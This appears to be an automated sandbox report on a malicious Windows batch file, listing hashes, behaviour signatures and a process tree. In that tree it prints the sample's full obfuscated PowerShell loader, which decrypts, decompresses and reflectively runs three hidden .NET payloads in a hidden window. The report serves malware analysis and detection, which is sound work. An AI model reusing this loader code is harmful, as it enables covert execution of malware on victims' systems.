Analysis

  • max time kernel
    119s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    11-11-2024 02:32

General

  • Target

    67d3bd519670a3a0fdcb3b30b0e143e73225cf561d2448a92e8e9378e989ac86.bat

  • Size

    535KB

  • MD5

    b9e1a4ea5f3b3fd0b0394183365edf8b

  • SHA1

    79bec6a406682c1385ba71a62e70b5744de0fb76

  • SHA256

    67d3bd519670a3a0fdcb3b30b0e143e73225cf561d2448a92e8e9378e989ac86

  • SHA512

    132bcd79be79e2b2fb6319d25f9ae89fc8bda65c9872792181b270cd31ad43998c1a34319e9d2f66e7bf3f035428231644d3c253e6eb1ae30095b64a702cf969

  • SSDEEP

    12288:jdnWhmK+sUu8PzDo84iBk1XZq51gzyqS996PxMdGos+Rcxdj:9WhmFsJ848Zk9KyMdGL+Y5

Score
3/10

Malware Config

Signatures

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\67d3bd519670a3a0fdcb3b30b0e143e73225cf561d2448a92e8e9378e989ac86.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2128
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('iZqoW2CsAJeY9D83aLEj+3rxJ2t2B3ify+RUYbhDZLc='); $aes_var.IV=[System.Convert]::FromBase64String('HqkR8+zl0nkre/D9VtHffg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$cFfgm=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$eBtZT=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$Baxky=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($cFfgm, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $Baxky.CopyTo($eBtZT); $Baxky.Dispose(); $cFfgm.Dispose(); $eBtZT.Dispose(); $eBtZT.ToArray();}function execute_function($param_var,$param2_var){ IEX '$UGiVy=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$iInyN=$UGiVy.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$iInyN.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$rrktb = 'C:\Users\Admin\AppData\Local\Temp\67d3bd519670a3a0fdcb3b30b0e143e73225cf561d2448a92e8e9378e989ac86.bat';$host.UI.RawUI.WindowTitle = $rrktb;$zVxza=[System.IO.File]::ReadAllText($rrktb).Split([Environment]::NewLine);foreach ($vxMZN in $zVxza) { if ($vxMZN.StartsWith('SkRmYQdHVSEYUqjPEfjK')) { $uwpGR=$vxMZN.Substring(20); break; }}$payloads_var=[string[]]$uwpGR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
      2⤵
        PID:3036
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1760

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1760-2-0x0000000074021000-0x0000000074022000-memory.dmp

      Filesize

      4KB

    • memory/1760-3-0x0000000074020000-0x00000000745CB000-memory.dmp

      Filesize

      5.7MB

    • memory/1760-4-0x0000000074020000-0x00000000745CB000-memory.dmp

      Filesize

      5.7MB

    • memory/1760-5-0x0000000074020000-0x00000000745CB000-memory.dmp

      Filesize

      5.7MB

    • memory/1760-6-0x0000000074020000-0x00000000745CB000-memory.dmp

      Filesize

      5.7MB

    • memory/1760-7-0x0000000074020000-0x00000000745CB000-memory.dmp

      Filesize

      5.7MB